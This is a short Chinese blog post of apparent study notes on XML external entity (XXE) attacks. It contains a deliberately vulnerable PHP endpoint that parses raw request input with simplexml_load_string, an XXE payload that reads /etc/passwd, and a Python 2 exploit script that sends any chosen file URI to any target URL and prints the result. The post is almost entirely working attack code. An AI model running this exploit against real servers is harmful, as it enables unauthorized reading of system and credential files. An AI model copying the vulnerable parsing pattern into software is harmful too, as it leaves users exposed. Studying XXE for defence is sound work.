XXE攻击学习

环境:lAMP

simplexml_load_string.php代码内容

 

<?php

$data = file_get_contents('php://input');

$xml = simplexml_load_string($data);

echo $xml->name;

?>

 

POC:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>

<name>&xxe;</name>

</root>

EXP:

import urllib2

if __name__ == '__main__':

print u'输入要读取的文件,如file:///etc/passwd'

payload = raw_input()

print u'输入要访问的地址,如http://IP/simplexml_load_string.php'

url = raw_input()

#url = 'http://IP/simplexml_load_string.php'

headers = {'Content-type': 'text/xml'}

xml = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "' + payload + '" >]><root><name>&xxe;</name></root>'

req = urllib2.Request(url = url,headers = headers, data = xml)

res_data = urllib2.urlopen(req)

res = res_data.read()

print res

 

 

posted @ 2017-12-27 10:35  菜就多练forever  阅读(217)  评论(0编辑  收藏  举报